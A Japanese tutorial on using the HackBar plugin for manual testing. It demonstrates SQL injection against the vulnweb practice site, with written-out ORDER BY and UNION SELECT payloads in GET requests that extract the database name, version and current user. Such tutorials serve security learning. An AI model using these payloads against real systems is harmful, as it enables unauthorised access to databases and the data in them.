Hello there, ('ω')ノ
Hackbarは、手動テストの手順に役立つように設計されたプラグインで。
まずは、下記からダウンロードして。
https://github.com/d3vilbug/HackBar/releases/tag/1.0
あとは、インポートするだけで。
無事にインストールを確認できて。
使い方は、挿入箇所にマウスを当てて右クリックで選択を。
インターセプトでも使用できて。
とりあえず、下記のサイトで試してみることに。
http://testphp.vulnweb.com/artists.php
前のぺージよりartistを選択して。
リクエストを確認して。
パラメータの後ろにOrder Byを挿入することに。
カラム数は、2を入力すると。
下記のように挿入されて。
GET /artists.php?artist=1+Order+By+2+
あとは、直接パラメータを変更したほうが効率は良くて。
GET /artists.php?artist=1+Order+By+3+
ここでエラーが出たので、カラム数は3つのようで。
GET /artists.php?artist=1+Order+By+4+
次にUNIONを試すことに。
複数のSELECTの結果を、ひとまとめにして表示するのがUNIONで。
下記のように挿入されるもののシステムは。
結果を1行分のデータしか表示しないようなので。
1行目のデータを表示されないようにする必要があって。
つまり、開発者が1行しか表示しないようにしているというわけで。
GET /artists.php?artist=1+Union+Select+1,2,3+
なので、最初のクエリを無効にして、出力されないようにすると。
本来、2行目に出力されるべきものが出力されて。
GET /artists.php?artist=-1+Union+Select+1,2,3+
その他の例は、以下のとおりで。
GET /artists.php?artist=1+and+0+Union+Select+1,2,3+
GET /artists.php?artist=1+and+false+Union+Select+1,2,3+
GET /artists.php?artist=null+Union+Select+1,2,3+
GET /artists.php?artist=1+and+0+Union+Select+1,2,3+
データベース名を探して。
GET /artists.php?artist=-1+Union+Select+1,database(),3+
バージョンとユーザ名も。
GET /artists.php?artist=-1+Union+Select+1,version(),current_user()+
バージョンが、8.0.22-0ubuntu0.20.04.2ということでmysqlのようで。
https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.22-0ubuntu0.20.04.2
Best regards, (^^ゞ
